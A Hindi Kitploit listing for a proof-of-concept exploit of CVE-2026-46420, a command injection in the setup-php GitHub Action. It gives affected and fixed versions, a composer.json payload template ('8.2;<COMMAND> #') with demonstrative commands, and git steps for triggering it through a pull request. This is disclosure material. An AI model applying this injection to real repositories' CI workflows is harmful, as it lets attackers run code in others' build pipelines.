Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-46420 — CVE-2026-46420 के लिए PoC, shivammathur/setup-php में रिपॉजिटरी-नियंत्रित PHP संस्करण समाधान के माध्यम से कमांड इंजेक्शन। | Kitploit
उपकरण/GitHubGitHub/jvr2022/cve-2026-46420
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubjvr2022/cve-2026-46420

CVE-2026-46420

CVE-2026-46420 के लिए PoC, shivammathur/setup-php में रिपॉजिटरी-नियंत्रित PHP संस्करण समाधान के माध्यम से कमांड इंजेक्शन।

रिपॉजिटरी देखें
1101 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-46420 PoC

shivammathur/setup-php में कमांड इंजेक्शन, जब PHP संस्करण रिपॉजिटरी-नियंत्रित फ़ाइलों से लोड किया जाता है।

प्रभावित:

root@kitploit:~
>= 2.25.0, < 2.37.1

ठीक किया गया:

root@kitploit:~
>= 2.37.1

PoC

लक्ष्य रिपॉजिटरी में पहले से ही एक कमजोर वर्कफ़्लो है जो पुल रिक्वेस्ट की सामग्री को चेकआउट करता है और [email protected] चलाता है।

हमलावर केवल composer.json बदलता है।

root@kitploit:~
-"php": "8.2"
+"php": [
+  "8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #"
+]

जब setup-php PHP संस्करण को composer.json से पढ़ता है, तो इंजेक्ट किया गया कमांड जनरेट की गई शेल स्क्रिप्ट में शामिल हो जाता है और निष्पादित होता है।

परिणाम:

root@kitploit:~
-FEATURE_FLAG=off
+FEATURE_FLAG=modified-by-poc

पुनरुत्पादन

लक्ष्य रिपॉजिटरी से एक ब्रांच बनाएं:

root@kitploit:~
git checkout -b poc-test

साफ composer.json को PoC संस्करण से बदलें:

root@kitploit:~
cp attacker/composer.json composer.json

कमिट और पुश करें:

root@kitploit:~
git add composer.json
git commit -m "update composer config"
git push -u origin poc-test

poc-test से main तक एक पुल रिक्वेस्ट खोलें।

Actions रन में दिखना चाहिए कि setup-php चरण के दौरान demo-app/.env.example संशोधित किया गया था।

कमांड बदलना

पेलोड प्रारूप है:

root@kitploit:~
8.2;<COMMAND> #

वर्तमान पेलोड:

root@kitploit:~
8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #

निष्पादित कमांड है:

root@kitploit:~
sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example

PoC जो करता है उसे बदलने के लिए, 8.2; और # के बीच के कमांड को बदलें।

एक फ़ाइल बनाएं:

root@kitploit:~
8.2;touch poc-executed #

एक फ़ाइल में लिखें:

root@kitploit:~
8.2;printf 'poc executed\n' > poc-result.txt #

कमांड आउटपुट प्रिंट करें:

root@kitploit:~
8.2;id #

उदाहरण composer.json:

root@kitploit:~
{
  "config": {
    "platform": {
      "php": [
        "8.2;touch poc-executed #"
      ]
    }
  }
}

समाधान

[email protected] या नए संस्करण में अपग्रेड करें।

पैच किए गए संस्करण पर वही पेलोड अस्वीकार कर दिया जाता है।

संदर्भ

https://github.com/shivammathur/setup-php/security/advisories/GHSA-pqwm-q9pv-ph8r

https://github.com/shivammathur/setup-php/commit/eeef37e059fb5368a5bc8ed8ce45ff54bd39b80b

टूल डाउनलोड करें